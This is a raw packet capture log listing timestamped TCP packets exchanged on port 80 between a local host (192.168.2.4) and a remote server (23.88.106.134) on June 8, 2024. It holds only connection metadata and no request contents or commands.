Jun 8, 2024 20:22:06.431447983 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.431448936 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.431484938 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.431519032 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.431551933 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.431586027 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.431622028 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.431663990 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.431705952 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.431766033 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.431799889 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.431827068 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.431835890 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.431849003 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.431869984 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.431889057 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.431906939 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.431926012 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.431940079 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.431960106 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.431977034 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.431993961 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.432010889 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.432032108 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.432045937 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.432073116 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.432079077 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.432096004 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.432113886 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.432136059 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.432173967 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.432564020 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.432599068 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.432625055 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.432634115 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.432657003 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.432671070 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.432697058 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.432707071 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.432722092 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.432740927 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.432763100 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.432775021 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.432799101 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.432809114 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.432828903 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.432843924 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.432868958 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.432878017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.432893991 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.432913065 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.432933092 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.432945013 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.432972908 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.432984114 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.433012009 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.433017969 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.433036089 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.433072090 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.433545113 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.433582067 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.433603048 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.433615923 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.433641911 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.433650017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.433672905 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.433701038 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.433707952 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.433736086 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.433758974 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.433772087 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.433794975 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.433805943 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.433824062 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.433841944 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.433859110 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.433877945 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.433896065 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.433911085 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.433933973 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.433945894 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.433964014 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.433979988 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.434000969 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.434034109 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.434447050 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.434482098 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.434509039 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.434515953 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.434531927 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.434551001 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.434572935 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.434585094 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.434597015 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.434619904 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.434634924 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.434654951 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.434684992 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.434776068 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.434797049 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.434809923 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.434833050 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.434844017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.434864998 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.434878111 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.434900045 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.434911966 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.434930086 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.434946060 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.434967041 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.434981108 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.435003996 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.435033083 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.435262918 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.435297012 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.435326099 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.435343981 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.435352087 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.435385942 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.435410976 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.435425043 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.435460091 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.435472965 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.435493946 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.435516119 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.435528994 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.435540915 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.435563087 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.435573101 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.435597897 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.435610056 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.435633898 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.435651064 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.435668945 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.435688019 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.435702085 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.435739040 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.435740948 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.435740948 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.435796976 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.436355114 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.436389923 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.436414957 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.436423063 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.436438084 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.436458111 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.436476946 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.436516047 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.436541080 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.436577082 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.436597109 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.436610937 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.436638117 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.436645985 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.436675072 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.436680079 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.436700106 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.436716080 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.436732054 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.436752081 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.436767101 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.436786890 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.436804056 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.436820030 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.436846972 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.436856985 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.436868906 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.436913013 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.437228918 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.437264919 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.437290907 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.437302113 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.437310934 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.437338114 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.437352896 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.437374115 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.437395096 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.437407970 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.437429905 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.437443018 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.437467098 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.437479019 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.437496901 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.437513113 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.437534094 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.437549114 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.437572956 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.437582970 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.437602997 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.437618971 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.437637091 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.437654972 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.437673092 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.437706947 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.437983990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438019991 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438047886 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.438055038 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438071012 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.438091040 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438108921 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.438124895 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438146114 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.438159943 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438185930 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.438194990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438210011 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.438230038 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438250065 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.438262939 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438287020 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.438302040 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438327074 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.438347101 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.438575983 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438591957 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438606977 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438623905 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438638926 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438640118 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.438640118 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.438657999 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438668966 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.438668966 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.438677073 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438695908 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438697100 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.438697100 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.438711882 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438715935 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.438730001 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438735962 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.438745975 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438755035 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.438764095 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438779116 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438781023 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.438781023 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.438795090 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438801050 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.438812017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438819885 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.438827991 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438844919 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438848019 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.438848019 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.438862085 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.438868046 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.438885927 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.438925982 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.439611912 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.439629078 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.439645052 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.439661980 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.439677954 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.439680099 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.439696074 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.439702034 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.439713001 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.439723969 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.439729929 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.439744949 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.439758062 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.439769983 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.439769983 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.439774990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.439790964 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.439805984 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.439809084 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.439821959 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.439832926 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.439834118 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.439840078 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.439853907 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.439860106 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.439874887 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.439877033 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.439893961 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.439901114 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.439901114 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.439919949 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.439939022 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.440490007 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.440514088 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.440530062 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.440546036 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.440551996 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.440551996 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.440562963 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.440573931 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.440581083 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.440598011 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.440597057 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.440597057 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.440614939 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.440620899 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.440632105 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.440639019 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.440648079 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.440658092 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.440665007 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.440675974 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.440682888 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.440694094 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.440701008 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.440717936 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.440721035 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.440721035 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.440733910 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.440741062 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.440752029 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.440768003 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.440773964 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.440773964 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.440785885 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.440794945 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.440815926 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.440834999 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.441427946 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.441453934 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.441468954 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.441485882 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.441494942 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.441504955 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.441515923 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.441525936 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.441536903 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.441545963 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.441557884 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.441562891 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.441580057 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.441584110 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.441584110 CEST	49731	80	192.168.2.4	23.88.106.134
